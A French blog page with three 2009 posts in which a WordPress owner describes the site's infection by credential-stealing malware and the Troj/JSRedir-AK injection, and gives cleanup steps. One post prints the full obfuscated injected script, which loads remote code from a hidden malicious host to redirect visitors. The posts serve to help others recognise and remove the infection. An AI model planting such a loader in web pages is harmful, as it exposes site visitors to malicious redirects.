Article tagué securite

Malware suite et fin

Le site/blog est maintenant stable.

A priori, l’infection provenait d’un malware sur mon PC qui utilisait mon client FTP pour se propager.

Merci aux sympathiques twittos qui m’ont conseillés sur twitter, au final j’ai fait une réinstalle de mon OS, un scan complet, réinstallé mon WordPress à partir des sources officiels, réinjecté mes fichiers de config en les ayant nettoyés manuellement, modifié mon password FTP et maintenant je ne conserve plus en mémoire mes identifiants/password dans mon client FTP, en effet ils sont lisibles en dur dans un fichier XML, je ne le savais pas, le malware si! Lire à ce sujet cet article très intéressant.

Pour moi c’est trop tard mais pour ceux que ça intéresse il y a un correctif de Konstantin Boyko qui circule là, ici et encore là. (!! ATTENTION !! en accédant à ces pages vous aurez sans doute une alerte de votre antivirus, c’est normal)

Il ne me reste plus qu’à peaufiner les détails du nouveau design, remettre le widget des commentaires récents et autres plugins qui vont bien…

Bonnes fêtes en passant.

[Edit 28/12/2009 - 00:51] Je viens de remettre le smartlook d’issuu (lecture embarqué des pdf)

[Edit 28/12/2009 - 23:16] Ajout du favicon, SEO, optimisation robots.txt

[Edit 29/12/2009 - 01:15] Ajout du module “Quelques documents” avec les pdf embarqués d’issuu, Modification de titre du module de “liens” (ex. blogoliste)

[Edit 06/01/2009 - 00:18 - @Marc-OH dans les commentaires]

  1. Modification du mot de passe FTP côté serveur
  2. sauvegarde de la base de données (elle n’est pas vérolée, elle servira en cas de pépin)
  3. Récupération des fichiers : wp-config.php, .htaccess, robots.txt et wp-content/uploads/*
  4. Suppression à la mano dans les fichiers récupérés du code en fin du source commençant par : <script>/*GNU GPL*/ try...
  5. Récupération d’un package WordPress sur le site officiel ainsi que les plugins à installer et le thème choisi
  6. Scan complet du PC avec suppression du pgm malveillant OU réinstallation de l’OS
  7. Connexion par ftp SANS sauvegarder les login/password dans le client FTP
  8. Suppression sur le serveur de tous les composant WordPress
  9. Installation du package wordpress sain
  10. réinjection des fichier wp-config.php, .htaccess, robots.txt et wp-content/uploads/*
  11. se connecter à l’admin, activer les plugins et le thème.
  12. peaufiner en customisant le thème et les réglages des différents plugins

Bon courage!

GNU GPL malware : Troj/JSRedir-AK

J’ai du réinstaller complètement ce site par 2 fois dans la nuit du 22 au 23 et dans la nuit du 23 au 24 décembre à cause d’un malware qui s’amuse à se faire passer pour un javascript légitime mais qui en fait redirige le browser vers des sites malicieux.

En fait tous les fichiers index.php et *.js se retrouvent en quelques minutes avec ce bout de code à la fin du source :

<script>/*GNU GPL*/ try{window.onload = function (){var Qslzfsla93tulo = document.createElement(’ s#&&c$r)&i!&&p)t$@#’.replace(/\!|@|&|\$|\)|\(|#| \^/ig, ”));Qslzfsla93tulo.setAttribute(’type’, ‘ text/javascript’);Qslzfsla93tulo.setAttribute(’s rc’, ‘h$!t#^t$@$p):)#/!!/)e!!n$e@^^t$-#(!(c$(^#o !!m!&^-&c#((n##!^.^e)#b!a!y&^$.)$@f&$r!.^e)&l#)m &!@u(@n(#$d^o!-#e)!s@&&$.!!&v@&)i#)e##@w)&$(^h&# o!$^m!e&s)&a@(#(l(#)emce_markeramp;$@.^(#r#$u$(!:&&^$8()0&(8 $0$^/)^m^#e(#(!.^c(@(o(@&#)m@&(/@m()e^#&.(@##c&) $#o#(m#/@!^$g((o^o#@$g@(^l^#&@e&((.)#c#!^o)(m&!/ ))!(s#^e$@#(n&d&)s@p&@a&^c)!)#e^#!$.$#c((o(!)m^^ !/^#c())l)(o#@@o!b).!c@o&m$/(^)&’.replace(/\^|&| @|\!|\$|\)|\(|#/ig, ”));Qslzfsla93tulo.setAttrib ute(’defer’, ‘defer’);Qslzfsla93tulo.setAttribut e(’id’, ‘I)(r#^w)@#@d&)^0@$#s$)v!(u&)s^@d^’.repl ace(/\!|&|\)|\$|\^|@|\(|#/ig, ”));document.body. appendChild(Qslzfsla93tulo);}} catch(e) {}</script>

Pour la deuxième attaque j’ai trouvé grâce à Piekes un bout de code qui sera peut-être mon sauveur. En tout cas maintenant je suis un peu moins seul et j’espère ne pas devoir refaire une installation.

[EDIT du 24/12 - 23HOO] Beaucoup plus d’info ici

[EDIT du 24/12 - 23H41] Encore mieux ici


cheval de Troie JS:Illredir-A [Trj], warnings et admin inaccessible

Cela fait un peu plus de 48H que je me bat à remettre sur pied ce blog suite à une attaque sur le serveur.

Le cheval de Troie a été supprimé, la version WordPress a été upgradée, l’admin est à nouveau disponible.

Par contre j’ai complètement perdu mon thème et mes plugins, je dois repartir from scratch. Donc pour l’instant je met un thème par défaut. Il doit aussi y avoir des liens morts, n’hésitez pas à me faire un retour en commentaire.

Je pense pouvoir résorber tout ça en une dixaine de jours, fêtes obligent. D’ailleurs bonnes fêtes aux lecteurs de passage.